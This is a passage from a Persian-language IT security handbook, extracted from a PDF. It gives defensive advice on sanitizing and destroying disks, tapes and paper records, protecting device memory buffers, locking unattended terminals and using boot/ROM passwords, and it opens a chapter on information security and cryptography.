‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻗﻄﻌﺎﺕ ﻛﻮﭼﻜﺘﺮ ﻭ ﻛﻮﭼﻜﺘﺮﻱ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ ﺗﺎ ﺍﻣﻜﺎﻥ ﺗﺤﻠﻴﻞ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻲ ﻣﻮﺍﺩ ﺣﺎﺻﻠﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﺓ ﻣﻐﻨﺎﻃﺴﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭﻟﻲ ﻫﺰﻳﻨﺔ ﺁﻥ ﺑﺎﻻﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺑﺘﺪﺭﻳﺞ ﺭﻭﺷﻬﺎﻱ ﭘﺎﻛﺴﺎﺯﻱ ﻭ ﺍﻧﻬﺪﺍﻡ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺭﺍﻳﺞ ﭘﺎﻛﺴﺎﺯﻱ‪ ،‬ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻞ ﺩﻳﺴﻚ ﻳﺎ ﻧﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻳﺎ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻳـﺪ‪ ،‬ﺷـﺎﻳﺪ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ‪ ،‬ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺍﺩﻩ ﺍﺯ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩﺍﻧﺪ‬
‫ﻻ ﻧﻮﺍﺭﻫﺎ ﺳﻪ ﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬﺎﻱ "ﺻﻔﺮ"‪ ،‬ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬـﺎﻱ "ﻳـﻚ"‪ ،‬ﻭ ﻳﻜﺒـﺎﺭ ﻫـﻢ ﺑـﺎ ﺍﻋـﺪﺍﺩ‬
‫ﺑﺎﺯﻳﺎﻓﺖ ﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺗﺼﺎﺩﻓﻲ‪ .‬ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻲﺗﻮﺍﻥ ﻧﻮﺍﺭ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺍﺯ ﺍﺭﺓ ﻧﻮﺍﺭﻱ ﻋﺒﻮﺭ ﺩﺍﺩ ﺗﺎ ﺑﻪ ﻫﺰﺍﺭﺍﻥ ﻗﻄﻌﺔ ﻛﻮﭼﻚ ﭘﻼﺳﺘﻴﻜﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻜﺘﻮﺏ ﻛﻪ ﺭﺍﻫﻲ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺠﺮﻣﺎﻥ ﻳﺎ ﺭﻗﺒﺎ ﺑﻪ ﻛﺎﺭ ﺑﻴﺎﻳﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ )ﺍﺯ ﺟﻤﻠﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﺎﻗﺺ(‪ ،‬ﺧﻼﺻﻪﻫﺎ‪ ،‬ﺍﺳﻨﺎﺩ ﻃﺮﺍﺣﻲ‪ ،‬ﻣﺘﻦ ﺍﻭﻟﻴﺔ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺍﺳﻨﺎﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‪ ،‬ﺧﺒﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﺩﺍﺧﻠﻲ‪ ،‬ﺩﻓﺘﺮﭼﺔ ﺗﻠﻔﻦ ﻭ ﻛﺘﺎﺑﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻱ ﺷﺮﻛﺖ ﻭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﺭﻳﺨﺘـﻪ ﺷـﻮﺩ‬
‫ﺷﺎﻣﻞ ﺍﻧﻮﺍﻉ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻳﺎﻝ‪ ،‬ﺳﻄﺢ ﻧﺼﺐ ﺑﻮﺩﻥ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺎﻧﻨـﺪ ﺁﻥ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺳﻨﺎﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺳﺎﻣﻲ ﻣﻴﺰﺑﺎﻧﻬﺎ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ ،IP‬ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﺷﻨﻴﺪﻩ ﺷﺪﻩ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﺎﻣﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ ﻭ ﺿﻮﺍﺑﻂ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ‪ - ٦٤‬ﻳﻚ ﻣﻌﺪﻥ ﻃﻼ ﺑﺮﺍﻱ ﻛـﺴﻲ ﻛـﻪ‬
‫ﺑﺪﻧﺒﺎﻝ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ‪ -‬ﺭﺍ ﺑﺪﻭﻥ ﻫﻴﭻ ﻣﺮﺍﻗﺒﺖ ﺧﺎﺻﻲ ﺩﻭﺭ ﻣﻲﺭﻳﺰﻧﺪ‪.‬‬
‫‪Sanitizing‬‬
‫‪Filtering‬‬
‫‪63‬‬
‫‪64‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﭘﺎﻛﺴﺎﺯﻱ ﺍﺳﻨﺎﺩ ﻣﻜﺘﻮﺏ‬
‫‪٢٩٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺮﺍﻱ ﻫﺮﺟﺎ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺩﺭ ﺁﻧﺠﺎ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﺩ ﻛﺎﻏﺬ ﺧﺮﺩﻛﻦ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ‬
‫ﺭﺍ ﺩﺭ ﺳﻄﻠﻬﺎﻱ ﺧﺎﻧﻪ ﺩﻭﺭ ﻧﻴﺎﻧﺪﺍﺯﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﺑﻴﺎﻭﺭﻧﺪ ﺗﺎ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﺮﺩ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﺰﺭﮒ ﺍﺳـﺖ ﻭ‬
‫ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﺪ‪ ،‬ﺷﺎﻳﺪ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺭﺭﻳﺰﻫﺎﻱ ﻛﺎﻏﺬﻫﺎﻱ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﻣﺤﻮﻃﻪ ﻛﺎﺭﺧﺎﻧﻪ ﺑﺴﻮﺯﺍﻧﻴﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺎﻓﻈﻪﻫﺎﻱ ﻣﺤﻠﻲ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﻧﺒﻮﻩ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﭘـﺮﺩﺍﺯﺵ ﺍﻟﻜﺘﺮﻳﻜـﻲ ﺩﺍﺩﻩﻫـﺎ ﻧﻴـﺰ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ ﺧـﻮﺩ‬
‫ﻻ ‪buffer‬ﻫﺎﻱ ﺣﺎﻓﻈﻪ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ ﺩﺳـﺘﻮﺭﺍﺕ‬
‫ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺎﻳﺎﻧﻪﻫﺎ‪ ،٦٥‬ﻣﻮﺩﻣﻬﺎ‪ ،‬ﻭ ﭼﺎﭘﮕﺮﻫﺎﻱ ﻟﻴﺰﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻨﺎﺳﺐ ﻛﻨﺘﺮﻟﻲ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻳﺎ ﺑﺎﺭﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﻪ ﻃﻮﺭ ﻃﺒﻴﻌﻲ ﻫﺮ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﻚ ﻣﺸﻜﻞ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺧﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺍﺯ‬
‫ﺁﻥ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺸﺎﺑﻪ ﻣﺤﻔﺎﻇﺖ ﻧﺸﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺣﺎﻓﻈـﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻭﺳﺎﻳﻞ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺿﺎﻓﻪ ﺑﺎ ﺧﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺩﺭ ﺍﻳﻦ ﺣﺎﻓﻈﻪﻫـﺎ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ ﻛـﺎﺭﺑﺮ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ‬
‫ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬﺎ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﻫﺎ ﻣﻲﻛﻨﻨﺪ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺗﺨﺮﻳﺒﮕﺮﺍﻥ ﻭ ﻣﻬﺎﺟﻤـﺎﻥ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺷﺨﺺ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺍﺯ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺍﻳﻦ ﺷﺨﺺ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺣﻤﻠﻪ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﺎ ﻛﻞ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ‪ :‬ﻫﺮﮔﻮﻧـﻪ‬
‫ﺭﺩﻳﺎﺑﻲ ﺣﻤﻠﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺍﻧﮕﺸﺖ ﺍﺗﻬﺎﻡ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﺨﺺ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺗﺨﺮﻳﺒﮕﺮ‪ .‬ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﭘﺎﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻱ ﻛﻮﺗﺎﻩ ﺯﻣﺎﻧﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻛﺮﺩ‪.‬‬
‫ﻣﺪﺗﻲ ﺑﻴﺶ ﺍﺯ ﺑﺎﺯﻩﻫﺎ ﹺ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻳﻦ ﻗﺪﺭﺕ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﮔﺮ ﭘﺎﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭼﻨﺪ ﺩﻗﻴﻘﻪ ﺑﻲﺍﺳـﺘﻔﺎﺩﻩ ﻣﺎﻧـﺪ ﺍﻭ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﺎﺭﺝ ‪ -‬ﻳﺎ ﺣﺪﺍﻗﻞ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻭ ﺭﺍ ﺧﺎﻟﻲ ﻭ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭﻱ ﺭﺍ ﻗﻔـﻞ ‪ -‬ﻛﻨﻨـﺪ‪ .‬ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺍﻳـﻦ ﻗﺎﺑﻠﻴﺘﻬـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻛﻠﻴﺪﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺑﻌﻀﻲ‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﻫﻢ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺳﻴﺴﺘﻢ ‪ openBOOT‬ﺷـﺮﻛﺖ ‪ Sun‬ﻭ ﻫﻤـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ‪ Macintosh‬ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﺍﻳﻤﻨﻲ ﺑﻴﺸﺘﺮﻱ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﻛـﻪ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ٦٦.‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺎﻳﺪ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﺁﻧـﺮﺍ ﺍﺯ ﭘﺮﻳـﺰ ﺑـﺮﻕ ﺟـﺪﺍ ﻛﻨـﺪ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﻤﺘﺮﻳﻦ ﺭﻭﺵ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ‪.‬‬
‫‪Terminals‬‬
‫‪٦٦‬‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﻳﻚ ﺩﻟﻴﻞ ﺧﻮﺏ ﺩﻳﮕﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺎﻓﺘـﺪ ﺍﮔـﺮ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺧﺎﻣﻮﺵ ﻛﻨﺪ‪.‬‬
‫‪65‬‬
‫‪٢٩١‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ‪ ،‬ﺗﺤﺮﻳﻒ‪ ،‬ﻭ ﻳﺎ ﺗﺨﺮﻳﺐ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺑﻌـﺎﺩ ﺍﻣﻨﻴـﺖ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ٦٧‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎ‪ ،‬ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺳﻴـﺴﺘﻢ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﻭ ﺻﺤﻴﺢ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩﺍﻧﺪ‪ .‬ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻗﺴﻤﺖ ﺗـﺎ‬
‫ﺣﺪ ﺯﻳﺎﺩﻱ ﻣﻔﻬﻮﻣﻲ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﭼﻨﺪ ﺍﺻﻞ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٦٨‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺳﺖ ﺍﺯ ﻓﻨﻮﻥ ﺭﻳﺎﺿﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗـﻮﺍﻥ ﻛﻠﻤـﺎﺕ ﻣﻜﺘـﻮﺏ ﻭ ﺩﻳﮕـﺮ‬
‫ﺍﻧﻮﺍﻉ ﭘﻴﺎﻡ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﺒﺪﻳﻞ ﻛﺮﺩ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻛﻠﻴﺪ ﻭﻳﮋﺓ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻗﻔﻞ ﭘﻴﺎﻣﻬﺎ ﻻﺯﻡ ﺍﺳـﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻧﺪﺍﺷـﺘﻪ‬
